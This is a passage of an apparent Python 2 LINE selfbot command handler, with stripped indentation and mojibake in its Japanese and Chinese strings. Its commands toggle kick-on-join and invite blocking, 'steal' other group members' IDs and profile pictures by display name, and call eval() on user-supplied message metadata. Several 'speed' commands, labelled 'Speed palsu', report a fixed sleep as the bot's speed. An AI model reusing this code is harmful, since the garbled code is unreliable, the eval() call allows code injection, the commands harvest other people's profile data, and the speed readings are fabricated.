if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if "Mode on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if "Mode on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if "Mode off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#==========================================================================
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自��‹•退出ï¼��é—œ"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["å���±æœ‰:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","Set"]:
if msg.from_ in admin:
md = "⭐Status Protection*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ (☆─┅═ই╬BABANG ADHI)=======*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
#---------------------Sc invite owner ke group------
elif "Anu: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Anu: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speef" in msg.text:
if msg.from_ in admin:
print("Speed respon")
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "kurangin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Rusakin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Tambah" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
